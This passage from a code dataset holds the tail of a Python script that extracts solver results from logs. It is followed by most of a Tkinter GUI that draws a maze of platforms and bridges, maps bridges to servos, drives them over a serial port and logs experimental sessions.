fo)\n\t\t\tfo.close()\n\nelif marker2 - marker1 < 0:\n\tfor k, t in enumerate([10, 60, 600, 3600, 10800, 21600]):\n\t\tfo = open('extracted/'+sys.argv[2]+'-'+sys.argv[3]+'-i'+sys.argv[4]+'-'+sys.argv[5]+'-t'+str(t)+'.ext', 'w')\n\t\tprint(str(inf)+' '+str(inf)+' '+str(inf)+' '+str(inf), file = fo)\n\t\tfo.close()\n#\tprint('& Out of memory & No solution & & & & & \\\\\\\\')\n\n\nelse:\n\trows = marker2 - marker1 + 1\n\ttime = ['x'] * rows\n\tornodes = ['x'] * rows\n\tandnodes = ['x'] * rows\n\tweight = ['x'] * rows\n\tcost = ['x'] * rows\n\tuw = ['x'] * rows\n\n\tfor i in range(marker1, marker2 + 1):\n\t\ttime[i - marker1] = float(re.findall('[0-9]+\\.[0-9]*', re.findall('\\[.*\\]', lines[i])[0])[0]) + pre_time\n\t\trow = lines[i].split()\n\t\tfor j, k in enumerate(row):\n\t\t\tif k == 'w' or k == 'u':\n\t\t\t\tbreak\n\t\tuw[i - marker1] = row[j]\n\t\tweight[i - marker1] = float(row[j + 1])\n\t\tornodes[i - marker1] = float(row[j + 2])\n\t\tandnodes[i - marker1] = float(row[j + 3])\n\t\tcost[i - marker1] = '{0:.4f}'.format(float(row[j + 4])*logE)\n\tj = 0\n\tcols = [0] * 6\n\tlabels = ['Cost', 'Nodes', 'Weight', 'Time']\n\tfor i, t in enumerate([10.0, 60.0, 600.0, 3600.0, 10800.0, 21600.0]):\n\t\twhile j < rows:\n\t\t\tif uw[j] == 'u':\n\t\t\t\tj += 1 \n\t\t\t\tcontinue\n\t\t\tif time[j] > t:\n\t\t\t\tif j > 0: \n\t\t\t\t\tj -= 1\n\t\t\t\tbreak\n\t\t\tj += 1\n\t\tif j < rows:\n\t\t\tcols[i] = [cost[j], ornodes[j] + andnodes[j], weight[j], time[j]]\n\tfor i, c in enumerate(cols):\n\t\tif c == 0:\n\t\t\tcols[i] = [cost[rows-1], ornodes[rows-1]+andnodes[rows-1], weight[rows-1], time[rows-1]]\n\n\tfor k, t in enumerate([10, 60, 600, 3600, 10800, 21600]):\n\t\tdat = ''\n\t\tfor j in range(0, 4):\n\t\t\tdat += str(cols[k][j]) + ' '\n\t\tfo = open('extracted/'+sys.argv[2]+'-'+sys.argv[3]+'-i'+sys.argv[4]+'-'+sys.argv[5]+'-t'+str(t)+'.ext', 'w')\n\t\t# filename example: extracted/jglp-pedigree20-i18-araobf-t600.ext\n\t\tprint(dat, file = fo)\n\t\tfo.close()\n","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"253005739","text":"import tkinter as tk\nfrom tkinter import *\nimport numpy as np\nimport itertools as it\nfrom tkinter import filedialog\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\nfrom serialcontrol import serial_ports, setup_ser\nimport time\nimport platform\n\n\nclass GUI:\n \"\"\"\n =================================================================================================\n =================================================================================================\n Functions\n =================================================================================================\n =================================================================================================\n \"\"\"\n \"\"\" DRAWING ON CANVAS \"\"\"\n # User interaction with canvas\n def canvas_editing_interactions(self, eventorigin):\n \"\"\"\n :param eventorigin:\n :return:\n\n Allows the user to draw the maze's platforms on the canvas and to assign bridge and servos ID to the maze parts\n \"\"\"\n # Get mouse click coordinates\n global x, y\n x = eventorigin.x\n y = eventorigin.y\n\n if self.drawingcheck_var: # If we are drawing and not assigning IDs\n if not self.assigningbridges and not self.assigningservos:\n if not self.placingsheleter:\n if not self.drawing_br_checkbtn_var.get(): # We are not manually drawing one bridge\n # Draw platform and guide lines\n self.c.create_line(x, y, x+500, y+500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x+500, y-500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x-500, y+500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x-500, y-500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x+500, y, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x-500, y, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x, y+500, fill='gray', tags=\"guideline\")\n self.c.create_line(x, y, x, y-500, fill='gray', tags=\"guideline\")\n\n radius = 50\n self.c.create_oval(x-radius, y-radius, x+radius, y+radius, outline=\"black\",\n fill=\"green\", width=2, tags=\"platform\")\n else:\n # Append click coordinates to list and draw bridge\n self.manualbr_coords.append((x,y))\n if len(self.manualbr_coords)>1:\n prev_p = self.manualbr_coords[-2]\n curr_p = self.manualbr_coords[-1]\n self.c.create_line(prev_p[0], prev_p[1],\n curr_p[0], curr_p[1], width=30, fill='green', tag=\"bridge_part\")\n\n else:\n # Draw shelter and toggle shelter button\n item = self.c.find_closest(eventorigin.x, eventorigin.y)[0]\n if self.c.gettags(item)[0] == 'platform':\n self.c.create_rectangle(x-20, y+20, x+20, y-20, fill='blue')\n self.shelterbtn.config(relief=\"raised\")\n self.placingsheleter = False\n print('Added shelter to platform')\n else:\n print(' Please place shelter on platform')\n else:\n # Control the assigning of bridge and servos ID\n item = self.c.find_closest(eventorigin.x, eventorigin.y)[0] # get closest canvas item to click\n if self.assigningbridges:\n # Assign bridge ID if clicked on a bridge\n if self.c.gettags(item)[0] == 'bridge' or self.c.gettags(item)[0] == 'bridge_part':\n sel_id = self.bridgeslist.curselection() # Get bridge ID from bridges list, update list\n if sel_id:\n self.c.create_line(x - 75, y, x + 75, y, width=30, fill='bisque2')\n self.c.create_text(x, y, text=self.bridgeslist.get(sel_id), font=(\"bold\", 14),\n tag=(self.bridgeslist.get(sel_id), 'bridge_label'))\n\n self.c.itemconfig(item, tags=self.bridgeslist.get(sel_id))\n self.bridgeslist.delete(sel_id)\n 
self.bridgeslist.select_set(0)\n if not self.bridgeslist.get(0):\n self.bridgeslist.insert(END, 'Assigned all bridges....')\n self.toggle_bridges()\n self.toggle_servos()\n self.servoslist.select_set(0)\n\n else:\n print('Please select bridge from the list')\n else:\n print('Please click on a bridge')\n else:\n sel_id = self.servoslist.curselection()\n if not sel_id:\n return\n\n # If we have a servo selected, assigning servos to bridge label\n if self.c.gettags(item)[1] == 'bridge_label' or self.c.gettags(item)[1] == 'bridge_label_2':\n # Check if it is the first or second servo we are adding\n if self.c.gettags(item)[1] == 'bridge_label':\n curr = self.c.gettags(item)\n self.c.itemconfig(item, tags=(curr[0], 'bridge_label_2'))\n xoffset = -75\n elif self.c.gettags(item)[1] == 'bridge_label_2':\n xoffset = 0\n\n # assign servo id to variables that stores servos numbs\n br_id = self.c.itemcget(item, 'text')\n ser_num = int(self.servoslist.get(sel_id)[-1])\n\n if br_id in self.servos_bridges_d:\n temp = self.servos_bridges_d[br_id]\n temp.append(ser_num)\n self.servos_bridges_d[br_id] = temp\n\n else:\n self.servos_bridges_d[br_id] = [ser_num]\n\n # Update lists and place tags on canvas\n sel_coord = self.c.coords(item)\n if sel_id:\n self.c.create_line(sel_coord[0]+xoffset, sel_coord[1]+22,\n sel_coord[0]+75+xoffset, sel_coord[1]+22,\n width=20, fill='bisque3', tag=('servo_name', self.servoslist.get(sel_id)[-1]))\n\n self.c.create_text(sel_coord[0]+37+xoffset, sel_coord[1]+22, text=self.servoslist.get(sel_id)[-1], font=(\"bold\", 12))\n\n self.servoslist.delete(sel_id)\n self.servoslist.select_set(0)\n if not self.servoslist.get(0):\n self.servoslist.insert(END, 'Assigned all servos....')\n self.toggle_servos()\n\n else:\n print('Please click on a bridge label')\n\n def nextbr_b(self):\n servos_l = []\n\n # Update widget list, bridges and servos lists\n self.bridges_count += 1\n if self.bridges_count == 1:\n self.bridgeslist.delete(END)\n self.servoslist.delete(END)\n self.bridgeslist.insert(END, \"Bridge_{}\".format(self.bridges_count))\n self.bridges_l.append(\"Bridge_{}\".format(self.bridges_count))\n\n servos_l.append(\"Servo_{}\".format((self.bridges_count * 2) - 1))\n servos_l.append(\"Servo_{}\".format(self.bridges_count * 2))\n [self.servoslist.insert(END, s) for s in servos_l]\n\n self.manualbr_coords = []\n\n # Draw maze on canvas, create objects lists, add to lists widgets\n def draw_maze(self):\n \"\"\"\n Gets called by draw maze button, removes gidelines and draws bridges lines\n Also produces a list of items on canvas\n \"\"\"\n platfs_count = 0\n servos_l = []\n\n # Delete not platforms items on canvas\n displayed, platfs_count, self.platfs_coords, self.platfs_l = self.deletefromcanvas_nontag('guideline',\n True, 'platform')\n\n if displayed:\n # Draw all possible bridges [might need something more sophisticated here]\n all_combinations = list(it.combinations(self.platfs_coords, 2))\n for comb in all_combinations:\n # Draw a bridge connecting the platforms\n self.c.create_line(comb[0][0], comb[0][1],\n comb[1][0], comb[1][1], width=30, fill='green', tag=\"bridge\")\n\n # Store coordinates in list\n self.bridges_count += 1\n self.bridges_l.append(\"Bridge_{}\".format(self.bridges_count))\n self.bridges_coords.append((comb[0][0], comb[0][1], comb[1][0], comb[1][1]))\n\n servos_l.append(\"Servo_{}\".format((self.bridges_count * 2) - 1))\n servos_l.append(\"Servo_{}\".format(self.bridges_count * 2))\n\n # Toggle bridges\n self.toggle_bridges()\n\n # add everything to the 
relevant lists widgets\n            self.edit_listswidgs(self.bridges_l, self.bridgeslist)\n            self.edit_listswidgs(servos_l, self.servoslist)\n            self.bridgeslist.select_set(0)\n\n    \"\"\" ELIMINATING OBJECTS FROM CANVAS \"\"\"\n    # Eliminate single items from canvas [right-click event]\n    def del_obj(self, eventorigin):\n        item = self.c.find_closest(eventorigin.x, eventorigin.y)[0]\n        self.c.delete(item)\n\n    # Clear everything from canvas and lists widgets, reset variables\n    def clear_maze(self):\n        # Delete everything from canvas, toggle buttons, edit lists\n        self.servos_bridges_d = {}\n\n        self.c.delete(\"all\")\n\n        # Clear lists widgets and variables\n        self.bridgeslist.delete(0, END)\n        self.bridgeslist.insert(END, \"Draw a maze...\")\n        self.servoslist.delete(0, END)\n        self.servoslist.insert(END, \"Draw a maze...\")\n\n        self.servos_bridges_d = {}\n        self.platfs_coords, self.bridges_coords = [], []\n        self.platfs_l, self.bridges_l = [], []\n\n        # Toggle buttons\n        if self.assigningbridges:\n            self.toggle_bridges()\n        if self.placingsheleter:\n            self.toggle_shelter()\n        if self.assigningservos:\n            self.toggle_servos()\n\n    \"\"\" Auxiliary functions \"\"\"\n    def deletefromcanvas_nontag(self, *args):\n        # Initialise variables\n        elimtag = args[0]\n        objcount = 0\n        objcoordslist = []\n        objlist = []\n\n        # Check if we want to extract the coordinates\n        if args[1]:\n            returncoords = True\n            recordtag = args[2]\n        else:\n            returncoords = False\n            recordtag = ''\n\n        # Delete items and return coordinates\n        displayed = self.c.find_all()\n        if displayed:\n            for d in displayed:\n                if self.c.gettags(d)[0] != elimtag:\n                    if returncoords and self.c.gettags(d)[0] == recordtag:\n                        objcount += 1\n                        # Get the centre of the object from its bounding box\n                        coord_l = self.c.coords(d)\n                        dx = coord_l[2] - int((coord_l[2] - coord_l[0]) / 2)\n                        dy = coord_l[3] - int((coord_l[3] - coord_l[1]) / 2)\n                        objcoordslist.append((dx, dy))\n                        objlist.append(\"Platform_{}\".format(objcount))\n                else:\n                    self.c.delete(d)\n        return displayed, objcount, objcoordslist, objlist\n\n    def edit_listswidgs(self, items_list, list_widget):\n        # Adds items to list widget\n        list_widget.delete(0, END)\n        for item in items_list:\n            list_widget.insert(END, item)\n\n    def plot_loaded(self, plotting_dict):  # plot loaded data and assign tags to editor lists\n        for (k, v) in sorted(plotting_dict.items()):\n            if k == 'bridges_coords':\n                for idx, coord in enumerate(v):\n                    try:\n                        tg_id = int(plotting_dict['bridges_tags'][idx][0])\n                        tg = 'Bridge_' + str(tg_id)\n                        drawlbl = True\n                    except Exception:\n                        tg = 'bridge_part'\n                        drawlbl = False\n                    self.c.create_line(coord[0], coord[1],\n                                       coord[2], coord[3], width=30, fill='green', tag=tg)\n\n                    if drawlbl:\n                        if self.avail_bridgeslist.get(0) == 'No unassigned bridges...':\n                            self.avail_bridgeslist.delete(0, END)\n                        self.avail_bridgeslist.insert(END, tg)\n\n                        # Get coords to place labels in the correct place\n                        (x, y) = ((coord[0] + coord[2])/2, (coord[1] + coord[3])/2)\n                        y += 25\n                        x -= 30\n                        self.c.create_line(x - 75, y, x + 60, y, width=30, fill='AntiqueWhite3')\n                        self.c.create_text(x - 30, y, text=tg, font=(\"bold\", 12))\n\n                        # Draw servo labels\n                        self.c.create_line(x + 15, y, x + 60, y, width=30, fill='AntiqueWhite2')\n                        xoffset = 30\n                        for s in self.servos_bridges[tg_id-1, :]:\n                            s_id = int(s)\n                            self.c.create_text(x + xoffset, y,\n                                               text=s_id, font=(\"bold\", 10))\n                            xoffset += 20\n\n                self.c.update()\n            elif k == 'platforms_coordinates':\n                for coord in v:\n                    self.c.create_oval(coord[0], coord[1], coord[2], coord[3], outline=\"black\",\n                                       fill=\"green\", width=2, tags=\"platform\")\n                self.c.update()\n\n    # Edit list 
entry\n    def edit_list_entry(self, event):\n        # Get item to be edited\n        cursel_listpos = event.widget.curselection()[0]\n        cursel = event.widget.get(cursel_listpos)\n        cursel_noid = cursel.split('_')[0]\n        print('Currently selected entry: ' + cursel + '\\n')\n\n        # Get new ID to be assigned from user input\n        newid = input('Please enter new ID number')\n        newentry = '{}_{}'.format(cursel_noid, newid)\n\n        # Check if other items have the same number\n        allinlist = event.widget.get(0, END)\n        allinlist = [x for x in allinlist]\n        if newentry not in allinlist:\n            print('New edited entry: ' + newentry + '\\n')\n        else:\n            print('Another item has the same ID, be careful!')\n            print('New edited entry: ' + newentry + '\\n')\n\n        event.widget.delete(cursel_listpos)\n        event.widget.insert(cursel_listpos, newentry)\n        event.widget.select_set(cursel_listpos)\n\n    # Move bridges across lists in the control panel\n    def assign_br(self, event):\n        try:\n            cursel = self.avail_bridgeslist.get(self.avail_bridgeslist.curselection())\n            if self.assigned_bridgeslist.get(0) == 'No assigned bridges...':\n                self.assigned_bridgeslist.delete(0, END)\n\n            self.assigned_bridgeslist.insert(END, str(cursel))\n            self.avail_bridgeslist.delete(self.avail_bridgeslist.curselection()[0])\n\n            all_oncanv = self.c.find_all()\n            for oncanv in all_oncanv:\n                if self.c.gettags(oncanv):\n                    if self.c.gettags(oncanv)[0] == cursel:\n                        self.c.itemconfig(oncanv, fill=\"orange\")\n        except Exception:\n            pass\n\n    def remove_assigned_br(self, event):\n        try:\n            cursel = self.assigned_bridgeslist.get(self.assigned_bridgeslist.curselection())\n            self.avail_bridgeslist.insert(END, str(cursel))\n            self.assigned_bridgeslist.delete(self.assigned_bridgeslist.curselection()[0])\n        except Exception:\n            pass\n\n    \"\"\" LOAD and SAVE \"\"\"\n    # Load design into control panel\n    def design_ready(self):\n        # Create array stating which servos are assigned to which bridges\n        self.servos_bridges = np.zeros((len(self.servos_bridges_d), 2))\n        for (k, v) in self.servos_bridges_d.items():\n            k_id = int(k[-1]) - 1\n            self.servos_bridges[k_id, :] = v\n\n        # Get lists of available bridges\n        allitems = self.c.find_all()\n        for itm in allitems:\n            tg = self.c.gettags(itm)[0]\n            if tg:\n                if tg[0:6] == 'Bridge':\n                    if self.avail_bridgeslist.get(0) == 'No unassigned bridges...':\n                        self.avail_bridgeslist.delete(0, END)\n                    self.avail_bridgeslist.insert(END, tg)\n\n        # Enable session start btn\n        self.sesscontrolbtn['state'] = ACTIVE\n        self.sesscontrolbtn['bg'] = 'green2'\n\n    # Save button function\n    def save_b(self):\n        # Set up array with servos ID associated to bridges\n        servos_bridges = np.zeros((len(self.servos_bridges_d), 2))\n        for (k, v) in self.servos_bridges_d.items():\n            k_id = int(k[-1])-1\n            servos_bridges[k_id, :] = v\n\n        # check that we have all the data necessary to save stuff\n        saveok = True\n        if len(servos_bridges) == 0:\n            print('Please draw a maze and assign bridges/servos first')\n            saveok = False\n\n        mazename = self.mazename.get()\n        if mazename == 'Enter maze name... 
[Decisi-o-nator_3000]':\n            print('Please give a name to your maze')\n            saveok = False\n\n        if saveok:\n            # Get save path\n            save_folder = filedialog.askdirectory()\n            servos_bridges_name = '{}/{}_bridges-servos'.format(save_folder, mazename)\n            canvas_name = '{}/{}_canvas'.format(save_folder, mazename)\n\n            # Save servo/bridges info into numpy array [which servo is assigned to which bridge]\n            np.save(servos_bridges_name, servos_bridges)\n            self.c.postscript(file=canvas_name, colormode='color')\n\n            # Save coords of items on canvas\n            allitems = self.c.find_all()\n            platfs_coordsl, bridges_coordsl, brtags_coordsl, servostags_coordsl = [], [], [], []\n            bridges_tagsl, servos_tagsl = [], []\n            for obj in allitems:\n                if self.c.gettags(obj):\n                    obj_tag = self.c.gettags(obj)[0]\n                    if len(self.c.gettags(obj)) > 1:\n                        obj_tag2 = self.c.gettags(obj)[1]\n                    else:\n                        obj_tag2 = ''\n                    obj_coord = self.c.coords(obj)\n\n                    if obj_tag == 'platform':\n                        platfs_coordsl.append(obj_coord)\n                    elif obj_tag[0:6] == 'Bridge' or obj_tag == 'bridge_part':\n                        if obj_tag2:\n                            brtags_coordsl.append(obj_coord)  # It means that this is a bridge tag, not a bridge\n                        else:\n                            bridges_coordsl.append(obj_coord)\n                            if obj_tag[0:6] == 'Bridge':\n                                bridges_tagsl.append([obj_tag])\n                    else:\n                        servostags_coordsl.append(obj_coord)\n                        servos_tagsl.append([obj_tag2])\n\n            # we save locations of platform circles, bridges lines and text labels to later replot the maze if necessary\n            # we don't save what's stored in servo labels as we can infer that from servos_bridges given that we know\n            # where the bridges are in an ordered list\n\n            # Arrange all data to be saved into one dictionary, then save it to text file\n            dict_to_save = {'platforms_coordinates': platfs_coordsl, 'bridges_tags': bridges_tagsl,\n                            'bridges_tags_coords': brtags_coordsl, 'bridges_coords': bridges_coordsl,\n                            'servos_tags': servos_tagsl,\n                            'servos_tags_coords': servostags_coordsl}\n\n            with open('{}/{}_canvas_items_coords.txt'.format(save_folder, mazename), 'w') as out:\n                for (k, v) in dict_to_save.items():\n                    out.write(str(k) + ' ' + str(v) + '\\n')\n\n    # Load and plot loaded data\n    def load_b(self):\n        self.clear_maze()\n\n        # Get files in maze folder and get maze name\n        load_folder = filedialog.askdirectory()\n        onlyfiles = [f for f in listdir(load_folder) if isfile(join(load_folder, f))]\n        mazename = onlyfiles[0].split('_')[0]\n        self.mazename.set(mazename)\n\n        # For each file load the info and save into correct variables\n        for f in onlyfiles:\n            filename = '{}/{}'.format(load_folder, f)\n            if f[-3:] == 'npy':\n                # load into array which servos are assigned to which bridges\n                self.servos_bridges = np.load(filename)\n\n            elif f[-3:] == 'txt':\n                # Load canvas items coordinates and labels into dictionary\n                plotting_data = {}\n                with open(filename) as textfile:\n                    for line in textfile:\n                        if len(line) > 4:\n                            splits = line.split(' ', 1)\n                            key = splits[0]\n                            temp = splits[1][1:-2]\n                            temp2 = temp.split('],')\n\n                            vlist = []\n                            for t in temp2:\n                                d1 = re.search(r\"\\d\", t)\n                                firstd = d1.start()\n                                d2 = re.search(r'(\\d)[^\\d]*$', t)\n                                lastd = d2.start() + 1\n\n                                vals = t[firstd:lastd].split(', ')\n                                tempvals = [float(x) for x in vals]\n                                vlist.append(tempvals)\n\n                            plotting_data[key] = vlist\n\n        # Okay now plot stuff on canvas\n        self.plot_loaded(plotting_data)\n\n        # Now close all bridges\n        self.close_all()\n\n        # Enable session start btn\n        self.sesscontrolbtn['state'] = NORMAL\n        self.sesscontrolbtn['bg'] = 'green2'\n\n    \"\"\" Serial Communication \"\"\"\n    # Check serial status\n    def checkser(self):\n        \"\"\"\n        Starts serial 
communication\n        :return: True on success, False on failure to start communication\n        \"\"\"\n        if self.comname.get() != \"COM number\":\n            try:\n                self.ser = setup_ser(self.comname.get())\n                self.ser_status_lbl.config(text='Serial started on port {}'.format(self.comname.get()))\n                return True\n            except Exception:\n                # report failure so callers never touch an unset self.ser\n                print('Failed to start serial')\n                return False\n        else:\n            print('please select COM first')\n            self.getcoms()\n            return False\n\n    # Get list of available comms\n    def getcoms(self):\n        coms = serial_ports()\n        print(coms)\n        self.ser_status_lbl['text'] = 'Available COMs: {}'.format(coms)\n\n    \"\"\" Maze and Session Control \"\"\"\n    # Close all bridges\n    def close_all(self):\n        # If we have serial communication issue a command to servos to close all bridges, update canvas\n        commcheck = self.checkser()\n        if commcheck:\n            # Change color of bridges on canvas, move stuff between lists widgets\n            for listbox_entry in self.assigned_bridgeslist.get(0, END):\n                if listbox_entry != 'No assigned bridges...':\n                    self.avail_bridgeslist.insert(END, listbox_entry)\n                    self.assigned_bridgeslist.delete(0)\n\n            all_oncanv = self.c.find_all()\n            for oncanv in all_oncanv:\n                if self.c.gettags(oncanv):\n                    if self.c.gettags(oncanv)[0][0:6] == 'Bridge':\n                        self.c.itemconfig(oncanv, fill=\"firebrick3\")\n            self.c.update()\n\n            # Move servos\n            self.ser.flushInput()   # flush input buffer, discarding all its contents\n            self.ser.flushOutput()  # flush output buffer, aborting current output\n            nservos = np.max(self.servos_bridges)\n            for snum in range(int(nservos)):\n                self.ser.write(str(snum+1).encode())\n                time.sleep(.08)\n                self.ser.write('c'.encode())\n                time.sleep(.04)\n\n            if self.is_session_running:\n                # Update log file\n                num_br = self.servos_bridges.shape[0]\n                bridges_status = []\n                for brnum in range(num_br):\n                    bridges_status.append(0)\n                self.sessionfile.write('Close all at: ' + time.asctime()[10:20] + '\\n')\n                for br in bridges_status:\n                    self.sessionfile.write(str(br))\n                    self.sessionfile.write(', ')\n                self.sessionfile.write('\\n\\n\\n')\n\n    # Execute pre-selected command [or wait for input from LabView program]\n    def exec_command(self):\n        \"\"\"\n        When the user has assigned bridges to open [the command] this function controls the execution of this command.\n        If the option to manually control the bridge is ON it simply executes the command, otherwise it\n        waits for a TTL pulse [which is picked up by openCM and transmitted to python through serial]\n        \"\"\"\n        commcheck = self.checkser()\n        if commcheck:\n            if not self.is_session_running:\n                print('Please start recording session first')\n                return\n\n            # move stuff between lists widgets\n            bridges_tomove_id, bridges_tomove_labels = [], []\n            for listbox_entry in self.assigned_bridgeslist.get(0, END):\n                if listbox_entry != 'No assigned bridges...':\n                    bridges_tomove_id.append(int(listbox_entry[-1]))\n                    bridges_tomove_labels.append(listbox_entry)\n\n            # If we are not controlling the maze manually, wait for ttl pulse\n            if not self.manualcontrol__var.get():\n                self.executebtn['bg'] = 'ivory2'\n                self.executebtn['text'] = 'Waiting for input'\n                self.ser.flushInput()\n                self.ser.flushOutput()\n                cmd_received = False\n                while not cmd_received:\n                    cmd = self.ser.read()\n                    if cmd.decode() == 't':\n                        cmd_received = True\n                self.executebtn['bg'] = 'khaki2'\n                self.executebtn['text'] = 'Execute Command'\n\n            self.ser.flushInput()\n            self.ser.flushOutput()\n            servos_tomove_l = []\n            for br_id in bridges_tomove_id:\n                correctid = br_id - 1\n                servos_tomove_l.append(self.servos_bridges[correctid, :].tolist())\n            servos_tomove_l 
= [item for sublist in servos_tomove_l for item in sublist]\n            servos_tomove_l = [int(x) for x in servos_tomove_l]\n\n            for servid in servos_tomove_l:\n                self.ser.write(str(servid).encode())\n                time.sleep(.08)\n                self.ser.write('o'.encode())\n                time.sleep(.04)\n\n            # Change color of bridges on canvas\n            all_oncanv = self.c.find_all()\n            for oncanv in all_oncanv:\n                if self.c.gettags(oncanv):\n                    if self.c.gettags(oncanv)[0][0:6] == 'Bridge':\n                        if int(self.c.gettags(oncanv)[0][-1]) in bridges_tomove_id:\n                            self.c.itemconfig(oncanv, fill=\"green\")\n            self.c.update()\n\n            # Update log file\n            num_br = self.servos_bridges.shape[0]\n            bridges_status = []\n            for brnum in range(num_br):\n                if brnum+1 in bridges_tomove_id:\n                    bridges_status.append(1)\n                else:\n                    bridges_status.append(0)\n            self.sessionfile.write('Exec. command at: ' + time.asctime()[10:20] + '\\n')\n            for br in bridges_status:\n                self.sessionfile.write(str(br))\n                self.sessionfile.write(', ')\n            self.sessionfile.write('\\n\\n\\n')\n\n    # Control start/end of session + data storage\n    def sessioncontrol(self):\n        \"\"\"\n        Starts/stops session recording. It requires the user to give the session a name and to\n        provide a path to where to store the session data, then it creates and opens/closes the corresponding file\n        \"\"\"\n\n        if not self.is_session_running:\n            # Start session recording\n            session_name = self.sess_savename.get()\n            mazename = self.mazename.get()\n\n            # Check that the session and the maze have a name\n            if session_name == \"Enter session name...\":\n                print('Please give a name for the session first')\n                return\n\n            if mazename == 'Enter maze name... [Decisi-o-nator_3000]':\n                print('Please give a name to your maze')\n                return\n\n            # Everything is okay so we can start the session\n            self.is_session_running = True\n\n            # Request folder in which to save text file, open file write session details\n            save_folder = filedialog.askdirectory()\n            session_save_name = '{}/{}_{}_sessdata.txt'.format(save_folder, session_name, mazename)\n\n            self.sessionfile = open(session_save_name, 'w')\n            self.sessionfile.write('Started: ' + time.asctime() + '\\n\\n')\n            self.sessionfile.write('Session: ' + session_name + '\\n\\n')\n            self.sessionfile.write('Maze: ' + mazename + '\\n\\n')\n\n            # Also save maze conformation as numpy: ROW=bridges statuses, COL=change num\n            self.mazeconformationrecord = np.empty((0, 0))\n\n            # Save canvas as an image\n            canvas_name = '{}/{}_{}_canvas'.format(save_folder, session_name, mazename)\n            self.c.postscript(file=canvas_name, colormode='color')\n\n            # Change the buttons look\n            self.sesscontrolbtn['bg'] = 'OrangeRed2'\n            self.sesscontrolbtn['text'] = 'Stop session'\n        else:\n            # Stop session recording: log time\n            self.sessionfile.write('Terminated: ' + time.asctime())\n\n            # Change button appearance and disable it\n            self.sesscontrolbtn['bg'] = 'ivory2'\n            self.sesscontrolbtn['text'] = 'session stopped'\n            self.sesscontrolbtn['state'] = DISABLED\n\n            # Close file\n            self.sessionfile.close()\n\n    \"\"\" Toggle functions \"\"\"\n    # Toggle buttons functions [they call each other]\n    def toggle_shelter(self):\n        if self.shelterbtn.config('relief')[-1] == 'sunken':\n            self.shelterbtn.config(relief=\"raised\")\n            self.placingsheleter = False\n        else:\n            self.shelterbtn.config(relief=\"sunken\")\n            if self.assigningservos:\n                self.toggle_servos()\n            if self.assigningbridges:\n                self.toggle_bridges()\n            self.placingsheleter = True\n\n    def toggle_bridges(self):\n        if self.bridgesbtn.config('relief')[-1] == 'sunken':\n            self.bridgesbtn.config(relief=\"raised\")\n            self.assigningbridges 
= False\n else:\n self.bridgesbtn.config(relief=\"sunken\")\n self.assigningbridges = True\n self.bridgeslist.select_set(0)\n\n if self.assigningservos:\n self.toggle_servos()\n if self.placingsheleter:\n self.toggle_shelter()\n\n def toggle_servos(self):\n if self.servosbtn.config('relief')[-1] == 'sunken':\n self.servosbtn.config(relief=\"raised\")\n self.assigningservos = False\n else:\n self.servosbtn.config(relief=\"sunken\")\n self.assigningservos = True\n self.servoslist.select_set(0)\n\n if self.assigningbridges:\n self.toggle_bridges()\n if self.placingsheleter:\n self.toggle_shelter()\n\n # Control behaviour of drawing check button\n def drawingcheck(self):\n if self.drawingcheckbtn_var.get():\n self.drawingcheck_var = False\n if self.drawing_br_checkbtn_var.get():\n self.drawing_br_checkbutton.invoke()\n else:\n self.drawingcheck_var = True\n\n def drawing_br_check(self):\n if self.drawing_br_checkbtn_var.get():\n self.drawingcheck_var = True\n # Delete all guidelines\n self.deletefromcanvas_nontag('guideline', False)\n self.nextbrbtnt['state'] = ACTIVE\n else:\n self.drawingcheckbutton.invoke()\n self.nextbrbtnt['state'] = DISABLED\n\n\n \"\"\"\n =================================================================================================\n =================================================================================================\n Design\n =================================================================================================\n =================================================================================================\n \"\"\"\n\n def __init__(self):\n # Flags\n self.drawingcheck_var = True\n self.placingsheleter = False\n self.assigningbridges = False\n self.assigningservos = False\n\n self.is_session_running = False # Used to check if session is running and control data acquisition\n\n # Initialise variables to store data\n self.servos_bridges_d = {} # Here we store the two servos ID linked with each bridge\n self.platfs_coords, self.bridges_coords = [], []\n self.platfs_l, self.bridges_l = [], []\n self.manualbr_coords = []\n self.bridges_count = 0\n\n # Create window of set size and at a set location\n self.root = tk.Tk()\n w, h, x, y = 1300, 830, 10, 50\n self.root.geometry('%dx%d+%d+%d' % (w, h, x, y))\n self.root.grid_columnconfigure(1, weight=1)\n self.root.configure(background='gray14')\n\n \"\"\"\n =================================================================================================\n GUI LAYOUT\n =================================================================================================\n \"\"\"\n\n \"\"\"\n =================================================================================================\n Canvas\n \"\"\"\n # Create canvas\n self.c = Canvas(self.root, width=800, height=800,\n background=\"lavender blush\", confine=True,\n relief='sunken')\n self.c.grid(row=0, column=0, sticky=\"w\", padx=(10,0))\n\n # Big frame right of canvas [ Contains sub frames]\n self.bigf = Frame(self.root)\n self.bigf.grid(row=0, column=1, sticky=\"nsew\", columnspan=4, pady=5, padx=10)\n self.bigf.grid_columnconfigure(0, weight=1)\n\n \"\"\"\n =================================================================================================\n Editor\n \"\"\"\n # Frame and session name frame\n self.name_f = Frame(self.bigf, relief=\"ridge\", bg=\"alice blue\", borderwidth=2, width=405)\n self.name_f.grid(row=0, sticky=\"nwe\")\n self.name_f.grid_columnconfigure(1, weight=1)\n\n self.fname_lbl = Label(self.name_f, text=\"Maze name\", 
